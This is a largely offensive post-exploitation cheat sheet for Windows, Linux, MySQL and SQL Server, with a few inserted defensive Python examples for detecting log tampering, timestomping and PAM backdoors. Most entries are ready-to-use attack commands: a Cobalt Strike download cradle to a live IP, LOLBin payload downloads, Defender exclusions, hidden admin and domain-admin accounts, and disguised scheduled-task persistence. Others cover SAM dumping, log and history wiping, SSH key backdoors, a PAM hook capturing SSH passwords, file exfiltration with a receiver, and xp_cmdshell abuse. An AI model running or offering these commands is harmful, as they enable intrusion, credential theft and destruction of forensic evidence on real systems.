Windows command cheat sheet
TCP egress check
powershell Test-NetConnection -ComputerName [target hostname or IP] -Port [port]
Remote file download
certutil
certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"
// Download file.exe from http://127.0.0.1:8080/ and save it as C:/Windows/temp/file.exe
PowerShell
powershell -Command "Invoke-WebRequest -Uri 'https://www.example.com/file.zip' -OutFile 'C:\Downloads\file.zip'"
BitsAdmin
bitsadmin /transfer "JobName" /download /priority normal https://www.example.com/file.zip C:\path\to\save\file.zip
rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.3.150/chfs/shared/1Z3.exe",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
IIS site queries
List the sites bound in IIS:
%windir%\system32\inetsrv\appcmd.exe list sites
Show the physical path of the site with ID 1:
%windir%\system32\inetsrv\appcmd list site /site.id:1 /config | findstr "physicalPath"
IIS configuration file:
C:\Windows\System32\inetsrv\config\applicationHost.config
%SystemRoot%\System32\inetsrv\config\applicationHost.config
Show the Windows version:
wmic os get Caption,osarchitecture
Modify file timestamps
powershell -command "(Get-Item 'C:\path\to\your\file.txt').CreationTime = '2024-01-01 12:00 AM'; (Get-Item 'C:\path\to\your\file.txt').LastWriteTime = '2024-01-02 12:00 AM'"
Process operations
Find the PID listening on a port:
netstat -ano | findstr :80
Find the program behind a PID:
tasklist /FI "PID eq 1234"
Find the executable path of a PID:
wmic process where ProcessId=1234 get ExecutablePath
Start a process:
start /b xxx.exe
Kill a process by name:
taskkill /f /t /im GotoHTTP.exe
Search for a process
tasklist | findstr "powershell"
PowerShell: run an EXE without a window
powershell -executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/Windows/temp/rd.exe'
net commands
List users: net user
List users with PowerShell: Get-WmiObject -Class Win32_UserAccount
List local groups: net localgroup
List members of the Administrators group: net localgroup Administrators
Add a user and set its password: net user test P@ssw0rd /add
Add the user to the Administrators group: net localgroup Administrators test /add
Add a user to the Remote Desktop Users group: net localgroup "Remote Desktop Users" guest /add
Enable the guest account: net user guest /active:yes
Change the guest account password: net user guest P@ssw0rd
Add guest to the Administrators group: net localgroup administrators guest /add
Add guest to the Remote Desktop Users group: net localgroup "Remote Desktop Users" guest /add
Show the local password policy: net accounts
Show current sessions: net session
Establish an IPC session: net use \\127.0.0.1\c$ "P@ssw0rd" /user:"domain\Administrator"
Managing the firewall with netsh
Show the firewall configuration:
netsh firewall show config
Windows Server 2003 and earlier: allow all connections for a program
netsh firewall add allowedprogram C:\nc.exe "allow nc" enable
Windows Server 2003 and later
netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"
Allow inbound 3389
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
Windows Defender: add an excluded directory
C:\Windows\System32\wbem\wmic.exe /Node:localhost /Namespace:\\Root\Microsoft\Windows\Defender Path MSFT_MpPreference call Add ExclusionPath=C:\
powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test"
Writing files
echo test > C:\test.txt // write (overwrite)
echo test >> c:\test.txt // append with a newline
set /p=test<nul>C:\test.txt // write without a trailing newline
set /p="121d2">>C:\test.txt // append without a newline
// PowerShell: append without a newline
powershell -Command "[System.IO.File]::AppendAllText('C:\windows\temp\111.txt', 'test')"
// Variants that avoid a space character
echo.123>>a.txt
echo,123>>a.txt
type;a.txt
// Decode a base64-encoded file and write it to test.jsp
certutil -f -decode base64.txt C:\\test.jsp
// Decode a hex-encoded file and write it to test.jsp
certutil -decodehex hex.txt C:\\test.jsp
Registry:
Restricted Admin Mode
Enable Restricted Admin mode from the command line:
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
Check whether it is enabled: if DisableRestrictedAdmin exists as REG_DWORD 0x0, the mode is enabled
REG query "HKLM\System\CurrentControlSet\Control\Lsa" | findstr "DisableRestrictedAdmin"
Query the RDP port
REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Port lookup: https://forum.ywhack.com/coding.php
Enable Remote Desktop
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
or
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
Dump the SAM database
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
Copy:
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
Copy them with https://github.com/3gstudent/NinjaCopy.
lsadump::sam /sam:sam.hiv /system:sys.hiv
Show free disk space per drive
:: Sizes are reported in bytes
:: Drive C
wmic LogicalDisk where "Caption='C:'" get FreeSpace,Size /value
:: Drive D
wmic LogicalDisk where "Caption='D:'" get FreeSpace,Size /value
Search for files:
:: Find a file named shell.jsp anywhere on drive D
cd /d D:\ && dir /b /s shell.jsp
:: Find .conf files on drive D whose contents contain "password" (case-insensitive):
findstr /s /i /n /d:D:\ "password" *.conf
Cobalt Strike check-in
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://122.114.55.117:8012/download/upload.ps1')
msiexec /q /i http://127.0.0.1:8080/ms10-051.msi
Set file attributes
attrib +s +a +h +r cs.exe // set the system, archive, hidden and read-only attributes on the file
Scheduled tasks
schtasks /create /ru system /tn "Microsoft\Windows\Multimedia\SystemMediaService" /sc ONSTART /tr "C:\cs.exe"
// Create a task named Microsoft\Windows\Multimedia\SystemMediaService that runs C:\cs.exe at boot; requires administrator rights
schtasks /change /tn "Microsoft\Windows\Multimedia\SystemSoundsService" /ru system /tr "C:\cs.exe" /enable
// Modify the Microsoft\Windows\Multimedia\SystemSoundsService task; requires administrator rights. /change cannot alter the schedule through the /sc or /mo parameters
RDP credentials
:: List all stored RDP credentials
C:\Users\<username>\AppData\Local\Microsoft\Credentials
dir /a C:\Users\Administrator\AppData\Local\Microsoft\Credentials
Packaging a directory on Windows for upload
powershell -Command "Compress-Archive -Path E:\update\ -DestinationPath E:\test.zip"
7z.exe a -r -p12345 C:\webs\1.7z C:\webs\
zip -r C:\webs\1.zip C:\webs\
Domain commands
whoami /user // show the current user's identity and SID
net config workstation // shows the domain name and other information
net user /domain // list domain users
net user edgeuser Admin12345 /add /domain // add a domain user
net group "domain admins" edgeuser /add /domain // add a domain administrator
net group "enterprise admins" edgeuser /add /domain // add an enterprise administrator
net group "domain admins" /domain // list domain administrators
net group "enterprise admins" /domain // list the Enterprise Admins group
net localgroup administrators /domain // list the domain's local Administrators group
net time /domain // show the domain controller and the time
net view /domain // show the domain name
net view /domain:redteam.local // list computers in the domain
net group "domain computers" /domain // list computers in the current domain
net group "domain controllers" /domain // show the domain controller names
net accounts /domain // show the domain password policy
nltest /domain_trusts // show domain trusts
nltest /domain_trusts /all_trusts /v /server:10.10.10.10 // show the trusts of a specific domain
nslookup -type=SRV _ldap._tcp.corp // locate domain controllers through SRV records
Linux command cheat sheet
Do not record commands for this session
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
Common log cleanup
echo > /var/log/btmp;echo > /var/log/wtmp;echo > /var/log/lastlog;echo > /var/log/utmp;echo > /var/log/syslog;cat /dev/null > /var/log/secure;cat /dev/null > /var/log/message;echo ok
- /var/log/btmp: all failed login attempts; view with lastb
- /var/log/lastlog: the last login time of every user; view with lastlog
- /var/log/wtmp: all user logins and logouts; view with last
- /var/log/utmp: users currently logged in; view with w, who, users, etc.
- /var/log/secure: security-related log messages
- /var/log/message: messages and errors logged after system boot
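The files listed above (btmp, wtmp, utmp) share one binary record format that last, lastb and who read. The parser below is an added example, not part of the original cheat sheet: it decodes the raw records with the standard library, pairs logins with logouts the way last does, and makes an emptied or truncated file obvious (zero records, or a size that is not a multiple of the record length). It assumes the 384-byte 64-bit glibc record layout; the sample wtmp bytes are constructed inline.

```python
import struct
from datetime import datetime, timezone

# glibc utmp record layout on 64-bit Linux (384 bytes), shared by wtmp, btmp and utmp:
# ut_type, padding, ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit (two shorts), ut_session, ut_tv (sec, usec), ut_addr_v6[4], 20 reserved bytes.
# Assumption: little-endian 64-bit glibc; other libcs/architectures differ.
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384

BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8
TYPE_NAMES = {1: "RUN_LVL", 2: "BOOT_TIME", 5: "INIT_PROCESS", 6: "LOGIN_PROCESS",
              7: "USER_PROCESS", 8: "DEAD_PROCESS"}


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data: bytes) -> list:
    """Parse raw wtmp/btmp/utmp bytes into a list of record dicts."""
    if len(data) % UTMP_SIZE:
        raise ValueError("size is not a multiple of the record size: truncated file or foreign layout")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        (ut_type, pid, line, _id, user, host, _term, _exit, _sess, sec, _usec,
         _a0, _a1, _a2, _a3, _res) = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": TYPE_NAMES.get(ut_type, str(ut_type)),
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "time": datetime.fromtimestamp(sec, tz=timezone.utc),
        })
    return records


def sessions(records: list) -> list:
    """Pair each USER_PROCESS login with the next DEAD_PROCESS on the same tty, as `last` does."""
    open_by_line = {}
    result = []
    for rec in records:
        if rec["type"] == "USER_PROCESS":
            entry = {"user": rec["user"], "host": rec["host"], "line": rec["line"],
                     "login": rec["time"], "logout": None}
            open_by_line[rec["line"]] = entry
            result.append(entry)
        elif rec["type"] == "DEAD_PROCESS" and rec["line"] in open_by_line:
            open_by_line.pop(rec["line"])["logout"] = rec["time"]
    return result


def make_record(ut_type: int, pid: int, line: str, user: str, host: str, sec: int) -> bytes:
    """Build one raw record; used only to construct the sample data below."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, sec, 0, 0, 0, 0, 0, b"")


# Constructed sample wtmp: a boot, a root SSH session that ended after an hour,
# and a second session that is still open.
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME, 0, "~", "reboot", "6.1.0", 1700000000),
    make_record(USER_PROCESS, 4242, "pts/0", "root", "10.0.0.5", 1700000100),
    make_record(USER_PROCESS, 4300, "pts/1", "alice", "10.0.0.9", 1700001000),
    make_record(DEAD_PROCESS, 4242, "pts/0", "", "", 1700003700),
])


def sample_sessions() -> list:
    return sessions(parse_utmp(SAMPLE_WTMP))


if __name__ == "__main__":
    for s in sample_sessions():
        end = s["logout"].isoformat() if s["logout"] else "still logged in"
        print(f'{s["user"]:<10} {s["line"]:<8} {s["host"]:<16} {s["login"].isoformat()} -> {end}')
```

To run it against a real host, pass the contents of /var/log/wtmp or /var/log/btmp to parse_utmp; an empty list from a system with any uptime, or a ValueError from a partially overwritten file, is the signal that the log was tampered with.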
Web log cleanup
Replace an IP address in the log in place:
sed -i 's/127.0.0.1/192.168.1.1/g' access.log
Remove selected log lines:
Use grep -v to drop the matching entries:
cat /var/log/nginx/access.log | grep -v evil.php > tmp.log
Write the edited log back over the original:
cat tmp.log > /var/log/nginx/access.log
Set a proxy for the terminal
export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
Show user login history
last
Create an administrator user as root
sudo useradd -m testt && echo "testt:admin@123" | sudo chpasswd && sudo usermod -aG wheel testt
Download files with cURL/wget
wget -P /tmp/ http://x.x.x.x:8080/shell
curl -o /tmp/xxx http://x.x.x.x:8080/shell
Send files with curl/wget
curl -X POST --data-binary @file.txt http://localhost:9000
wget --post-file=file.txt http://localhost:9000
curl -T file.txt http://localhost:9000
A minimal Python receiver for the upload commands above:
import socket

def start_server(host, port, buffer_size=1024):
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    server_socket.listen(5)
    print(f"Server listening on {host}:{port} ...")
    while True:
        client_socket, addr = server_socket.accept()
        print(f"Connection from {addr}")
        try:
            # Read the HTTP request headers
            request = b""
            while b"\r\n\r\n" not in request:
                chunk = client_socket.recv(buffer_size)
                if not chunk:
                    break
                request += chunk
            if b"\r\n\r\n" not in request:
                continue
            headers, file_data = request.split(b"\r\n\r\n", 1)
            header_text = headers.decode("latin-1").lower()
            # curl sends "Expect: 100-continue" for large bodies and waits for this reply
            if "expect: 100-continue" in header_text:
                client_socket.sendall(b"HTTP/1.1 100 Continue\r\n\r\n")
            # Honour Content-Length when present; otherwise read until the client closes
            content_length = None
            for line in header_text.split("\r\n"):
                if line.startswith("content-length:"):
                    content_length = int(line.split(":", 1)[1].strip())
            remaining = content_length - len(file_data) if content_length is not None else None
            while remaining is None or remaining > 0:
                data = client_socket.recv(buffer_size if remaining is None else min(buffer_size, remaining))
                if not data:
                    break
                file_data += data
                if remaining is not None:
                    remaining -= len(data)
            # Extract a file name (adapt the extraction to your needs)
            file_name = "received_file"  # default file name
            with open(file_name, "wb") as f:
                f.write(file_data)
            print(f"File {file_name} saved ({len(file_data)} bytes)")
            client_socket.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
        finally:
            client_socket.close()

if __name__ == "__main__":
    HOST = "0.0.0.0"
    PORT = 9000
    start_server(HOST, PORT)
Modifying file timestamps
Set the timestamp of /www/wwwroot/shell.php to 2024-05-16 12:00:24 (format [[CC]YY]MMDDhhmm[.ss]):
touch -t 202405161200.24 /www/wwwroot/shell.php
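touch -t (and the PowerShell CreationTime/LastWriteTime assignment in the Windows section) only rewrite the timestamps that user space is allowed to set; the inode change time (ctime) is set by the kernel whenever the inode is modified, including by that very timestamp change, and cannot be backdated without raw disk access. The following is an added example, not from the original cheat sheet, showing how a responder can use that asymmetry: it creates a fresh file and one backdated the way the touch command above does, then flags files whose mtime is older than their ctime. The tolerance value and the "suspicious" label are assumptions; chmod, chown, rename and package installs also leave mtime behind ctime, so treat a hit as a lead, not proof.

```python
import os
import tempfile
import time
from datetime import datetime, timezone


def timestomp_indicators(path: str, tolerance_s: float = 5.0) -> dict:
    """Compare a file's mtime with its ctime and flag an mtime that predates ctime.

    Assumption: a POSIX filesystem, where st_ctime is the inode change time.
    On Windows os.stat reports the creation time in st_ctime instead, so the
    comparison there is "modified before it was created", which is equally telling.
    """
    st = os.stat(path)
    gap = st.st_ctime - st.st_mtime
    return {
        "path": path,
        "mtime": datetime.fromtimestamp(st.st_mtime, tz=timezone.utc),
        "ctime": datetime.fromtimestamp(st.st_ctime, tz=timezone.utc),
        "mtime_before_ctime_s": gap,
        "suspicious": gap > tolerance_s,
    }


def scan_directory(root: str, tolerance_s: float = 5.0) -> list:
    """Return the indicator dicts of every regular file under root that is flagged."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            info = timestomp_indicators(os.path.join(dirpath, name), tolerance_s)
            if info["suspicious"]:
                hits.append(info)
    return hits


def demo() -> dict:
    """Build a temp dir with one fresh file and one backdated like `touch -t 202405161200.24`."""
    workdir = tempfile.mkdtemp()
    fresh = os.path.join(workdir, "index.php")
    stomped = os.path.join(workdir, "shell.php")
    for p in (fresh, stomped):
        with open(p, "w") as fh:
            fh.write("<?php\n")
    # os.utime sets atime/mtime exactly as touch -t does; the kernel bumps ctime to now.
    backdate = time.mktime((2024, 5, 16, 12, 0, 24, 0, 0, -1))
    os.utime(stomped, (backdate, backdate))
    return {
        "fresh": timestomp_indicators(fresh),
        "stomped": timestomp_indicators(stomped),
        "hits": scan_directory(workdir),
    }


if __name__ == "__main__":
    result = demo()
    for key in ("fresh", "stomped"):
        info = result[key]
        print(f'{info["path"]}: mtime={info["mtime"].isoformat()} '
              f'ctime={info["ctime"].isoformat()} suspicious={info["suspicious"]}')
```

On a web server, point scan_directory at the document root and compare the hits with the deployment history; a PHP file whose mtime sits years before its ctime, and before the neighbouring files, is the one to pull for review first.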
Show the DNS servers
cat /etc/resolv.conf
Stop the firewall
systemctl stop firewalld
service iptables stop
Ubuntu:
ufw disable
Search for sensitive information
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.yaml\|.*\.sh\|.*\.jsp\|.*\.log\|.*\.txt\|.*\.xml" -print0 | xargs -0 grep -E "=jdbc:|pass=|passwd=|aliyun|password"
Writing files with echo
// Write directly with echo:
echo xxx > /www/xxx.jsp
// Write base64-decoded content:
echo eHh4ZGFzMQ== | base64 -d > /www/xxx.jsp
// Append
echo xxx >> /www/xxx.jsp
Online encoder: https://forum.ywhack.com/coding.php
Write an SSH public key:
echo c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFEazRVTjhFUTFXOFBWMQ== | base64 -d > authorized_keys
// Use printf to append at the end of the file; add \n if a newline is needed
// Reference: https://baijiahao.baidu.com/s?id=1727019063436737118&wfr=spider&for=pc
printf "ssh-rsa xxx" >> /root/.ssh/authorized_keys
Compressing and packaging files
// Pack the /home/mail and /home/web directories into /tmp/web.tar.gz
tar czvf /tmp/web.tar.gz /home/mail /home/web
// zip
zip -r /tmp/web.zip /home/mail /home/web
// Use -x to exclude entries, e.g.:
zip -r /tmp/web.zip /home/mail /home/web -x /home/mail/test.txt -x /home/web/log/*
Split before upload
split -n 3 fscan // split into 3 files
split -b 500k fscan // split fscan into 500 KB chunks
Merge on Windows:
copy /b xaa+xab fscan
type xaa xab > fscan
Merge on Linux:
cat xaa xab > fscan
Transfer a file as hex
# Convert the file to hex
xxd -p filename
# Restore it locally:
xxd -p -r filename > aa.tar.gz
Capturing SSH passwords with pam_exec
SELinux must be disabled:
setenforce 0 # disable
setenforce 1 # enable
Edit /etc/pam.d/sshd
Add as the first line:
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
/tmp/sshd.sh:
chmod 777 /tmp/sshd.sh
#!/bin/sh
echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log
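The persistence above leaves a distinctive trace in /etc/pam.d: a pam_exec.so line carrying expose_authtok, pointing at a script outside the package-managed module directories. The audit below is an added example, not from the original cheat sheet; it parses pam.d-style configuration (continuation lines, comments, bracketed controls, @include) and reports exactly those two conditions. The trusted and untrusted directory lists are assumptions about common distribution layouts, and the two configuration samples are constructed for the example.

```python
import os

# Where distributions install PAM modules (assumption: common Debian/RHEL layouts).
TRUSTED_MODULE_DIRS = (
    "/lib/security/", "/lib64/security/", "/usr/lib/security/", "/usr/lib64/security/",
    "/usr/lib/x86_64-linux-gnu/security/", "/usr/lib/aarch64-linux-gnu/security/",
)
# Locations no PAM helper script should ever be executed from.
UNTRUSTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")


def parse_pam_config(text: str) -> list:
    """Parse /etc/pam.d-style text into (type, control, module, args) tuples.

    Handles backslash continuation, '#' comments and bracketed controls such as
    [success=1 default=ignore]; @include lines are returned with type "@include".
    """
    entries = []
    logical = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            logical += line[:-1] + " "
            continue
        tokens = (logical + line).split()
        logical = ""
        if len(tokens) < 2:
            continue
        if tokens[0] == "@include":
            entries.append(("@include", "", tokens[1], []))
            continue
        if tokens[1].startswith("["):
            i = 1
            while i < len(tokens) and not tokens[i].endswith("]"):
                i += 1
            control, rest = " ".join(tokens[1:i + 1]), tokens[i + 1:]
        else:
            control, rest = tokens[1], tokens[2:]
        if rest:
            entries.append((tokens[0], control, rest[0], rest[1:]))
    return entries


def audit_pam(text: str, source: str = "<string>") -> list:
    """Report pam_exec password exposure and modules or helpers loaded from untrusted paths."""
    findings = []
    for ptype, _control, module, args in parse_pam_config(text):
        if ptype == "@include":
            continue
        if os.path.basename(module) == "pam_exec.so":
            targets = [a for a in args if a.startswith("/")]
            if "expose_authtok" in args:
                findings.append(f"{source}: pam_exec with expose_authtok passes the cleartext "
                                f"password on stdin to {targets or ['<no path>']}")
            for target in targets:
                if target.startswith(UNTRUSTED_PREFIXES):
                    findings.append(f"{source}: pam_exec runs {target} from an untrusted location")
        if module.startswith("/") and not module.startswith(TRUSTED_MODULE_DIRS):
            findings.append(f"{source}: module {module} is loaded from outside the module directories")
    return findings


def audit_pam_d(directory: str = "/etc/pam.d") -> list:
    """Audit every file in a pam.d directory on a live host."""
    findings = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings.extend(audit_pam(fh.read(), name))
    return findings


# Constructed samples: the sshd file from the technique above, and a clean common-auth.
SAMPLE_SSHD = """\
# PAM configuration for the Secure Shell service
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
@include common-auth
account    required     pam_nologin.so
session    [success=ok ignore=ignore module_unknown=ignore default=bad] pam_selinux.so close
session    required     pam_loginuid.so
"""
SAMPLE_CLEAN = """\
auth       required     pam_env.so
auth       [success=1 default=ignore] pam_unix.so nullok \\
           try_first_pass
auth       requisite    pam_deny.so
"""


def audit_samples() -> dict:
    return {"sshd": audit_pam(SAMPLE_SSHD, "sshd"), "clean": audit_pam(SAMPLE_CLEAN, "common-auth")}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(f"{name}: {len(findings)} finding(s)")
        for f in findings:
            print("  " + f)
```

Run audit_pam_d() as root on a suspect host; also compare the files against the package manager's checksums (dpkg -V or rpm -V), since the parser only sees what the config says, not who wrote it.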
Installing Docker on Debian/Ubuntu
Install Docker and Docker Compose on Debian 12 / Ubuntu 24.04
Install the required packages
apt update
apt upgrade -y
apt install curl vim wget gnupg dpkg apt-transport-https lsb-release ca-certificates
Add Docker's GPG key and apt repository
Debian:
curl -sSL https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Ubuntu:
curl -sSL https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Machines in mainland China can use the Tsinghua TUNA mirror:
Debian:
curl -sS https://download.docker.com/linux/debian/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/debian $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Ubuntu:
curl -sS https://download.docker.com/linux/ubuntu/gpg | gpg --dearmor > /usr/share/keyrings/docker-ce.gpg
echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-ce.gpg] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu $(lsb_release -sc) stable" > /etc/apt/sources.list.d/docker.list
Then refresh the package index and install Docker CE and the Docker Compose plugin
apt update
apt install docker-ce docker-ce-cli containerd.io docker-compose-plugin
Install Docker Compose (standalone binary)
curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64 > /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
Installing a JDK
Ubuntu 18: run
sudo apt install openjdk-11-jre-headless
sudo apt install openjdk-11-jdk
Manually
tar -xzvf jdk-13.0.2_linux-x64_bin.tar.gz
cd jdk-13.0.2/
pwd
vim /etc/profile
export JAVA_HOME=/root/jdk-13.0.2
export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib/
export PATH=$PATH:$JAVA_HOME/bin
source /etc/profile
Database command cheat sheet
mysql
mysql: show the IPs that have connected
SELECT * FROM performance_schema.hosts;
show full processlist;
mysql: find the largest tables
select table_name,table_rows,table_schema,table_comment from information_schema.tables order by table_rows desc;
Find which database and table contain a "user" column
SELECT
    TABLE_SCHEMA AS database_name,
    TABLE_NAME AS table_name,
    COLUMN_NAME AS column_name
FROM
    INFORMATION_SCHEMA.COLUMNS
WHERE
    COLUMN_NAME LIKE '%user%';
Count how often each table has been accessed
// schema, table, access count
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;
Check file write permission
mysql> show global variables like '%secure%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | ON |
| secure_file_priv | | <- empty: file writes allowed
| secure_file_priv | NULL | <- NULL: file writes disabled
+------------------+-------+
SHOW VARIABLES LIKE "secure_file_priv";
- NULL: file import/export is disabled.
- A directory path: only files directly inside that directory are allowed; subdirectories were tested and are rejected too.
- Empty: no directory restriction.
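The three cases above are easy to misread in a hurry, since an empty cell and NULL look alike in the client output yet mean opposite things. The code below is an added example, not from the original cheat sheet: it parses the secure_file_priv row as the mysql client prints it, describes what the value means, and models the allow/deny rule the three bullets state (NULL refuses everything, empty allows any path, a directory allows only files directly inside it). It assumes canonical paths; the real server additionally resolves symlinks before comparing directories.

```python
import posixpath
from typing import Optional


def parse_show_variables_row(line: str) -> Optional[str]:
    """Turn a '| secure_file_priv | value |' client row into the variable's value.

    The client prints the literal NULL for an unset value, which is returned as
    None; an empty cell (the variable set to '') is returned as ''.
    """
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) != 2 or cells[0] != "secure_file_priv":
        raise ValueError("not a secure_file_priv row")
    return None if cells[1] == "NULL" else cells[1]


def classify_secure_file_priv(value: Optional[str]) -> str:
    """Describe the effect of a secure_file_priv value."""
    if value is None:
        return "disabled: LOAD_FILE(), LOAD DATA and SELECT ... INTO OUTFILE are refused"
    if value == "":
        return "unrestricted: the server may read or write any path its OS account can reach"
    return f"restricted: file operations only directly inside {value}"


def file_operation_allowed(secure_file_priv: Optional[str], target: str) -> bool:
    """Model of the rule described above for a given target path.

    Assumption: paths are canonical apart from '..' and repeated slashes, which
    are normalised here so that '/dir/../x' cannot masquerade as '/dir/x'.
    """
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    allowed_dir = posixpath.normpath(secure_file_priv)
    target_dir = posixpath.dirname(posixpath.normpath(target))
    # Only files directly in the directory qualify; subdirectories are rejected.
    return target_dir == allowed_dir


if __name__ == "__main__":
    for row in ("| secure_file_priv | NULL |",
                "| secure_file_priv |  |",
                "| secure_file_priv | /var/lib/mysql-files/ |"):
        value = parse_show_variables_row(row)
        print(f"{row!r:45} -> {classify_secure_file_priv(value)}")
        for path in ("/var/lib/mysql-files/out.txt", "/var/www/html/test.txt"):
            print(f"    {path}: {'allowed' if file_operation_allowed(value, path) else 'refused'}")
```

For hardening, set secure_file_priv to a dedicated directory (or NULL where file I/O is not needed) in the server's my.cnf; it is read-only at runtime, so the SELECT ... INTO OUTFILE write shown further down cannot loosen it.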
Run SQL without an interactive login
mysql -uadmin -proot test -e "select now()" -N >H:/work/target1.txt
mysql -uroot -e "show databases;" >1.txt
Basic commands
Show the version: select version();
Show the character set: select @@character_set_database;
List databases: show databases;
List tables: show tables;
List columns: show columns from table_name;
Show the host name: select @@hostname;
Show the OS: select @@version_compile_os;
MySQL installation path: select @@basedir;
Data directory: select @@datadir;
Describe a table: describe table_name;
Show the root password hash: select User,Password from mysql.user;
Read a file: select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C);
Write a file: select 'testtest' into outfile '/var/www/html/test.txt' from mysql.user;
Allow remote connections: GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;
MySQL installation path (all variables): show variables;
Update a row: UPDATE `DX15`.`dx15_common_member` SET `uid` = '1' WHERE `dx15_common_member`.`uid` =40407; // changes uid 40407 to uid 1
Change the root password: mysqladmin -u root password "newpwd";
Query a table: select concat(User,0x3a,Password) from mysql.user;
List all tables of a database: SHOW TABLES FROM `databases`;
Get the first 20 rows: SELECT * FROM `admin_bbs` ORDER BY 1 DESC LIMIT 0,20;
Get the row count: SELECT COUNT(*) AS CNT FROM `dede_admin`;
sql server
Related tools:
xp_cmdshell
Before SQL Server 2005, xp_cmdshell is enabled by default:
exec master..xp_cmdshell 'whoami';
Check whether the xp_cmdshell stored procedure exists (1 = present, 0 = absent):
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';
Remove xp_cmdshell:
exec master..sp_dropextendedproc xp_cmdshell;
Restore xp_cmdshell:
exec master..sp_addextendedproc xp_cmdshell,'xplog70.dll';
From SQL Server 2005 on, xp_cmdshell is disabled by default and must be enabled manually, which requires sa privileges:
-- Allow advanced options to be changed
exec sp_configure 'show advanced options',1;
-- Apply the configuration
RECONFIGURE;
-- Enable xp_cmdshell
exec sp_configure 'xp_cmdshell',1;
-- Apply the configuration
RECONFIGURE;
-- Check whether it is enabled
exec sp_configure;
-- Run a system command
exec master..xp_cmdshell 'whoami';
-- Write a webshell
